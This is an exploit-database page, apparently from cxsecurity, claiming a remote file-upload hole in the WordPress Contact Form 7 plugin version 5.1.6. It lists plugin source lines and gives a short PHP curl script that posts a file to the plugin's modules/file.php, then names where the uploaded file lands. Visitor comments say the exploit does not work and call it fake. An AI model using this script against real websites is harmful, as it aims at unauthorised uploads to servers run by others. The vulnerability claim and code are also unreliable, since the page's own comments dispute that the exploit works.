Wordpress Plugin contact-form-7.5.1.6 - Remote File Upload

2020.02.11
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Tile: Wordpress Plugin contact-form-7.5.1.6 - Remote File Upload [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.11 Vulnerable Source: 134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) 82: $file = $_FILES[$name] : null; 132: $new_file = path_join($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 131: $filename = wp_unique_filename($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 126: $filename = wpcf7_antiscript_file_name ($filename); 125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 124: $filename = $file['name']; 82: $file = $_FILES[$name] : null; 82: $file = $_FILES[$name] : null; 78: ⇓ function wpcf7_file_validation_filter($result, $tag) Exploit: <?php $shahab="file.jpg"; $ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg


Vote for this issue:
25%
75%

Comment it here.
ratin | Date: 2020-05-24 03:30 CET+1
No works
Jesus | Date: 2020-09-15 01:57 CET+1
Fake exploit don't waste your time
medo | Date: 2020-09-30 13:31 CET+1
how it works?
asHagal | Date: 2022-05-25 10:01 CET+1
do not works.

Copyright 2025, cxsecurity.com

 

Back to Top